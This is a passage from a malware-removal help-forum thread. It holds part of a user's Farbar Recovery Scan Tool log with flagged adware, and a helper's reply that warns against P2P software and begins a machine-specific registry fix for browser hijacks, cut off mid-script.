(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.9.0.1210 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.9.0.1210 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.0.112 - Adobe Systems, Inc.)
AGEIA PhysX v7.11.13 (HKLM-x32\...\{95FC26FB-19FD-4A96-BBB1-B1062E8648F5}) (Version: 7.11.13 - AGEIA Technologies, Inc.)
AUSkey software 1.4.4 (HKLM-x32\...\{24D37B30-83B4-46A7-A691-30F2FCEAE58E}) (Version: 1.4.4 - ABR)
BitComet 1.37 (HKLM-x32\...\BitComet) (Version: 1.37 - CometNetwork)
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
calibre (HKLM-x32\...\{E0601182-5F00-4513-95D0-AFDCB7A0C658}) (Version: 1.41.0 - Kovid Goyal)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.48.1.0347 - Disc Soft Ltd)
ECI Client v6.0 (HKLM-x32\...\{DE730F37-A198-4112-A3B6-97786F34354A}) (Version: v6.0.1 - Australian Taxation Office)
Fallout 3 (HKLM-x32\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout New Vegas Ultimate Edition (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version:  - )
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.117 - Google Inc.)
Google Drive (HKLM-x32\...\{418BAAD1-754D-48B4-B078-46EF4F25AF42}) (Version: 1.15.6556.8063 - Google, Inc.)
GoToMeeting 6.4.4.1831 (HKCU\...\GoToMeeting) (Version: 6.4.4.1831 - CitrixOnline)
iSkysoft Video Converter Ultimate(Build 5.4.1.0) (HKLM-x32\...\iSkysoft Video Converter Ultimate_is1) (Version: 5.4.1.0 - iSkysoft Software)
Java 7 Update 17 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417017FF}) (Version: 7.0.170 - Oracle)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217017FF}) (Version: 7.0.650 - Oracle)
Java Auto Updater (x32 Version: 2.1.65.20 - Oracle, Inc.) Hidden
Jing (HKLM-x32\...\{22800204-9E53-45C7-B6F3-5BB0F1C1A147}) (Version: 2.8.13007.1 - TechSmith Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Lost Via Domus (HKLM-x32\...\{2702B8FC-6003-4AC6-ADBC-EC65746D800A}) (Version: 1.0 - Ubisoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Corporation (Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Corporation (x32 Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{6965A8D2-465D-4F98-9FAA-0E9E2348F329}) (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{91110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Security Client (Version: 4.6.0305.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
MixPad (HKLM-x32\...\MixPad) (Version: 3.46 - NCH Software)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 28.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 28.0 (x86 en-US)) (Version: 28.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 28.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MTA:SA v1.3.5 (HKLM-x32\...\MTA:SA 1.3) (Version: v1.3.5 - Multi Theft Auto)
OutfoxTV (HKLM-x32\...\OutfoxTV) (Version:  - OutfoxTV)
Outlook Setup Tool (HKLM-x32\...\outlookset) (Version: 2.2.19 - Starfield Technologies)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PhotoPad Image Editor (HKLM-x32\...\PhotoPad) (Version: 2.37 - NCH Software)
Pixillion Image Converter (HKLM-x32\...\Pixillion) (Version: 2.59 - NCH Software)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Spotify (HKCU\...\Spotify) (Version: 0.9.14.13.gba5645ad - Spotify AB)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 4.52 - NCH Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 5.55 - NCH Software)
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinZip 18.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}) (Version: 18.5.11111 - WinZip Computing, S.L. )
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2275511576-419542734-2349628481-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1440\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
 
==================== Restore Points  =========================
 
01-10-2014 03:40:57 Removed WinZip 18.5
01-10-2014 08:15:32 Windows Update
06-10-2014 23:52:56 Windows Update
12-10-2014 10:55:58 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 13:34 - 2009-06-11 08:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {07BB6D31-E1B4-4CAC-A67B-922398F9EEB3} - \UpdaterEX No Task File <==== ATTENTION
Task: {34AB405F-5E82-4260-8A90-D62022C97303} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {56BB85DD-9856-431F-BB8B-DF90EFFBC782} - System32\Tasks\{B4A540EE-B703-4F88-8A36-0C4394E38292} => Chrome.exe 
Task: {92861FCA-C8BE-4844-97F1-D60C23CC1291} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {A1AB5C21-09B3-46F6-8BF3-B0507A0B83DE} - System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000 => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe [2014-10-12] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6} - \PC Performer No Task File <==== ATTENTION
Task: {CF7962CC-8917-4EFA-8CFD-8DF92989274A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EB35C775-29EC-49F9-B105-E54F44A3CD74} - System32\Tasks\{EBC5B4FF-C5FF-4433-9543-6D4208E88780} => Chrome.exe 
Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-04-08 16:35 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2012-01-10 21:12 - 2012-01-10 21:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 04060488 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppGoogleNaClPluginChrome.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 13632840 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT2
AlternateDataStreams: C:\Users\Mitey Fresh\Downloads\RE Contract.eml:OECustomProperty
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DelaypluginInstall => C:\ProgramData\iSkysoft\Video Converter Ultimate\DelayPluginI.exe
MSCONFIG\startupreg: iSkysoft Helper Compact.exe => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
MSCONFIG\startupreg: Jing => C:\Program Files (x86)\TechSmith\Jing\Jing.exe
MSCONFIG\startupreg: LifeCam => "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: OutfoxTV => C:\Program Files\OutfoxTV\OutfoxTV\DesktopContainer.exe
MSCONFIG\startupreg: Spotify => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: VX1000 => C:\Windows\vVX1000.exe
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2275511576-419542734-2349628481-500 - Administrator - Disabled)
Guest (S-1-5-21-2275511576-419542734-2349628481-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2275511576-419542734-2349628481-1014 - Limited - Enabled)
Mitey Fresh (S-1-5-21-2275511576-419542734-2349628481-1000 - Administrator - Enabled) => C:\Users\Mitey Fresh
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
 
System errors:
=============
Error: (10/15/2014 00:43:35 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/15/2014 07:58:03 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/14/2014 06:47:56 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/14/2014 00:41:00 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Definition Update for Microsoft Security Essentials - KB2310138 (Definition 1.185.3120.0).
 
Error: (10/14/2014 00:40:31 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.185.3011.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.6.0305.00
 
Source Path: 4.6.0305.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (10/13/2014 10:23:08 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.185.3011.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.6.0305.00
 
Source Path: 4.6.0305.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (10/13/2014 10:12:17 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/13/2014 10:54:36 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/12/2014 09:44:58 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
Error: (10/10/2014 07:34:16 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.
 
 
Microsoft Office Sessions:
=========================
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/15/2014 00:47:44 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/15/2014 08:02:16 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/14/2014 06:52:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/14/2014 00:32:17 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/13/2014 10:17:26 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® CPU P6100 @ 2.00GHz
Percentage of memory in use: 51%
Total physical RAM: 3886.04 MB
Available physical RAM: 1903.57 MB
Total Pagefile: 7770.26 MB
Available Pagefile: 5746.81 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.39 GB) (Free:111.4 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Data) (Fixed) (Total:180.27 GB) (Free:117.47 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: DA22E49B)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

  • 0

#5
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Hi again, :)

 

Sorry we missed you the first time around. We were really slammed early in the month and it took a while to dig out. However, we found you and now let's get you taken care of. :thumbsup:

 

The source of much of your problems is your use of Peer to Peer software (BitComet). Bitcomet let's in a myriad of infections. That said, I will post the warning below.

 

Next, your browsers are a mess. I wish I could say it more gently, but...  So, I am going to try and remove the issues with IE and FF (Chrome seems to be ok), but it may make more sense to just reset the Browsers to their factory setting. Lets try the fix first. If that doesn't work, then we'll do the reset. The fix is in the FRST fix and you don't need to do anything other than follow the instructions below. If IE and FF are not working after the FRST fix and you're unable to proceed with the other tools, then perform the reset. If that fails to correct the issue and you can't run the other tools, let me know (likely you'll have to use Chrome) and I'll work up Plan "B".

 

Please do these steps in this order and then post the results in the same order :)

 

warning.gif P2P warning!

  • P2P programs, as they are legal itself, are often used to obtain some illegal downloads. Currently it's one of the best ways to get infected. There have been some extreme cases in which passwords, private or financial data was exposed to file sharing network because of bad P2P configuration.

I strongly recommend full uninstallation of any P2P apps. To do so:
  • Press the WindowsKey.png + R on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for previously mentioned program(s), right-click the entry and click Uninstall.

This is optional, but please consider this. In case of leaving it installed, please refrain from using it while we're cleaning your machine.

FRST.gif Fix with Farbar Recovery Scan Tool



icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif
icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif

Press the WindowsKey.png + R on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire content of the codebox below and paste into the Notepad document:
    start
    
    AppInit_DLLs: C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL => C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL File Not Found
    
    AppInit_DLLs-x32: c:\progra~3\fastan~1\fastan~1.dll => "c:\progra~3\fastan~1\fastan~1.dll" File Not Found
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x6E8195E10142CE01
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
    
    HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
    
